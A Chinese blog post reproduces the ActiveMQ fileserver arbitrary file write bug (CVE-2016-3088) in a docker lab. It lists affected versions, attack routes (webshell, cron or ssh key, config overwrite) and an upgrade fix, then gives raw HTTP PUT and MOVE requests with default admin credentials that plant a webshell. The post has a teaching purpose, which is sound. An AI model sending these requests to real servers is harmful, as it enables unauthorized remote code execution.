ActionMQ任意文件写入漏洞(cve-2016-3088)复现

最新推荐文章于 2024-05-02 13:31:38 发布
最新推荐文章于 2024-05-02 13:31:38 发布
阅读量213 收藏
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39922242/article/details/109310370
版权

ActiveMQ任意文件写入漏洞(CVE-2016-3088)

文章目录

一、环境搭建

搭建及运行漏洞环境:

docker-compose build
docker-compose up -d

ActiveMQ的默认端口为61616端口和8161端口,其中8161为web控制台端口,本漏洞就出现在web控制台中。

访问http://ip:8161/看到web页面,说明环境已成功运行。

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-fMizayr6-1603780202455)(C:\Users\bsd\AppData\Roaming\Typora\typora-user-images\image-20201027115511739.png)]

二、背景简述

ActiveMQ的web控制台分三个应用,admin、api和fileserver,其中admin是管理员页面,api是接口,fileserver是储存文件的接口;admin和api都需要登录后才能使用,fileserver无需登录。

fileserver是一个RESTful API接口,我们可以通过GET、PUT、DELETE等HTTP请求对其中存储的文件进行读写操作,其设计目的是为了弥补消息队列操作不能传输、存储二进制文件的缺陷,但后来发现:

  1. 其使用率并不高
  2. 文件操作容易出现漏洞

所以,ActiveMQ在5.12.x~5.13.x版本中,已经默认关闭了fileserver这个应用(你可以在conf/jetty.xml中开启之);在5.14.0版本以后,彻底删除了fileserver应用。

三、影响版本

Apache ActiveMQ 5.0.0 - 5.13.2

四、漏洞详情

本漏洞出现在fileserver应用中,漏洞原理其实非常简单,就是fileserver支持写入文件(但不解析jsp),同时支持移动文件(MOVE请求)。所以,我们只需要写入一个文件,然后使用MOVE请求将其移动到任意位置,造成任意文件写入漏洞。

文件写入有几种利用方法:

  1. 写入webshell
  2. 写入cron或ssh key等文件
  3. 写入jar或jetty.xml等库和配置文件

写入webshell的好处是,门槛低更方便,但前面也说了fileserver不解析jsp,admin和api两个应用都需要登录才能访问,所以有点鸡肋;写入cron或ssh key,好处是直接反弹拿shell,也比较方便,缺点是需要root权限;写入jar,稍微麻烦点(需要jar的后门),写入xml配置文件,这个方法比较靠谱,但有个鸡肋点是:我们需要知道activemq的绝对路径。

五、漏洞防御

1、ActiveMQ Fileserver 的功能在 5.14.0 及其以后的版本中已被移除。建议用户升级至 5.14.0 及其以后版本。

六、漏洞利用案例

写入webshell

前面说了,写入webshell,需要写在admin或api应用中,而这俩应用都需要登录才能访问。

默认的ActiveMQ账号密码均为admin,首先访问http://ip:8161/admin/test/systemProperties.jsp,查看ActiveMQ的绝对路径:

image

然后上传webshell:

PUT /fileserver/1.txt HTTP/1.1
Host: localhost:8161
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Length: 120976

webshell...

image
访问文件内容如如下:
image

移动到web目录下的api文件夹(/opt/activemq/webapps/api/s.jsp)中:

MOVE /fileserver/1.txt HTTP/1.1
Destination: file:///opt/activemq/webapps/api/1.jsp
Host: localhost:8161
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Length: 0

image

成功访问webshell,表明webshell写入成功:

在这里插入图片描述

波塞冬xxx
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
vulhub漏洞复现 CVE-2016-3088
03-14
vulhub漏洞复现 CVE-2016-3088
CVE-2022-42920 BCEL 任意文件漏洞
include_voidmain的博客
11-23 833
这些方法返回常量池的索引。所以对于漏洞的利用只需要在常量数组中前面写入足够长的垃圾数据,后面写入恶意常量数据,将会在通过getFinalConstantPool方法返回对应的ConstantPool对象之后调用其dump方法从二进制流到文件流的转换。
修复路径穿越、任意文件写入漏洞
InterestAndFun的博客
02-23 7090
前段时间随手写的一个文件上传服务,在公司的渗透测试下漏洞百出,其中少不了路径穿越和任意文件写入漏洞。其实这两个漏洞的修复并不复杂,只要对入参进行两个条件的校验就可以了。
Tomcat PUT方法任意文件漏洞CVE-2017-12615)
weixin_45653478的博客
05-02 1076
在Apache Tomcat服务器中,PUT方法通常用于上传文件。攻击者可以通过发送PUT请求,将恶意文件上传到服务器。当攻击者发送PUT请求时,Tomcat服务器会将请求中的数据写入指定的文件。如果攻击者能够控制文件路径,那么他们可以将恶意文件写入任意位置,从而实现任意文件写入
ActiveMQ任意文件写入漏洞CVE-2016-3088
dgjkkhcf的博客
07-29 715
fileserver是一个RESTful API接口,我们可以通过GET、PUT、DELETE等HTTP请求对其中存储的文件进行读写操作,其设计目的是为了弥补消息队列操作不能传输、存储二进制文件的缺陷,但后来发现:①其使用率并不高;②文件操作容易出现漏洞...
thinkphp 6.x 任意文件写入漏洞
Aiwin的博客
08-06 3808
thinkphp 6.x 任意文件写入漏洞
Apache Flink -任意文件写入漏洞复现CVE-2020-17518)
0xSec
01-11 1435
Apache Flink 是高效和分布式的通用数据处理平台,由Apache软件基金会开发的开源流处理框架,其核心是用Java和Scala编写的分布式流数据流引擎(简单来说,就是跟spark类似)
解决 SSL/TLS协议信息泄露漏洞(CVE-2016-2183) ps1 文件
12-26
解决 SSL/TLS协议信息泄露漏洞(CVE-2016-2183) ps1 文件
DirtyCow提权漏洞复现CVE-2016-5195)1
08-08
脏牛(Dirty Cow)漏洞,全称为“竞争条件写入时复制”(Copy-on-Write Race Condition),在2016年被发现,其安全漏洞编号为CVE-2016-5195。这个漏洞主要影响的是Linux内核,特别是从2007年的2.6.22版本到修复前的...
CVE-2016-8655 Linux内核提权漏洞POC
11-18
CVE-2016-8655 Linux内核提权漏洞POC
【网络安全文件写入漏洞原理及利用方式简析
等风来
12-24 2790
当web网站对用户写入、上传的文件缺乏权限限制或文件类型的检验功能不全等,攻击者可以通过web网站写入恶意文件到服务器。该漏洞经常出现在模板备份、文件编辑、文件备份等功能点。PHP文件写入的常见函数包括fopen()、fwrite()、fputs()、file_put_contents()等。
『Java安全』Struts 2.3.14.2 action占位符OGNL注入漏洞S2-015复现与浅析
Ho1aAs‘s Blog
08-29 954
action的name可以设置为*,当URL没有匹配到任何action的时候,就会匹配*对应的action;而一般开发中获取*对应的字符串,然后result返回以该字符串命名的jsp,获取该字符串用的是占位符{x},依照星号从左往右从1开始匹配例如:......
【Tomcat-8.5.19】文件写入漏洞
m0_63241485的博客
08-25 3506
tomcat后端使用org.apache.catalina.servlets.JspServlet来处理jsp或是jspx后缀的请求, 而JspServlet负责处理所有JSP和JPSX类型的动态请求, 从代码没有发现处理HTTP PUT类型的操作,所以可知PUT以及DELTE等HTTP操作由DefautServelt实现。该漏洞实际上是利用了windows下文件名解析的漏洞来触发的。
redis未授权访问_任意文件写入漏洞(提权):
qq_51862881的博客
03-01 332
redis未授权访问_任意文件写入漏洞(提权)
jsp相关漏洞
qq_44790964的博客
11-25 2120
注入 xss 上传 编辑器 st2漏洞 反序列漏洞 网站容器 弱口令漏洞 Struts漏洞 是Apache基金会jakarta项目组的一个开源项目 .action 可能会存在st2漏洞 漏洞挖掘 单个目标站进行测试 工具爬行 找打存在漏洞地址例如 xx.action (一般存在登录的地方 注册 留言的地方) 可能会存在 用相关工具进行测试即可 批量查找与利用(.do 是jsp的页面) 登录或...
Struts 漏洞
weixin_30530339的博客
05-02 759
1.Struts 远程执行漏洞(很早的)       起因:.do:以do为扩展名的网页文件是java语言写的,以Struts为框架的;它的运行环境是tomcat,weblogic等;通常用的数据库有oracle,mysql,mssql,access等。网页后台程序是*.jsp 或者 struts的组件文件*.do;.do一般是servlet的映射。j2ee平台,基于struts框架开发;*.d...
ActiveMQ任意文件写入漏洞分析溯源
ST0new的博客
09-04 1074
title: ActiveMQ任意文件写入漏洞分析溯源 categories: WEB安全 tags: http方法利用 文章目录墨者学院WEB安全ActiveMQ任意文件写入漏洞分析溯源ActiveMQ 简介漏洞复现解决方案参考链接 墨者学院 WEB安全 ActiveMQ任意文件写入漏洞分析溯源 ActiveMQ 简介 ActiveMQ 是 Apache 软件基金会下的一个开源消息驱动中...
SSL漏洞CVE-2016-2183漏洞复现
最新发布
06-29
SSL漏洞CVE-2016-2183,也称为"FREAK"漏洞(FREAK stands for Factoring RSA Exponent K-Anonymity),是一个影响TLS/SSL协议的高级加密标准(AES)实现的安全漏洞。该漏洞利用了客户端和服务器在选择加密套件时的一...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值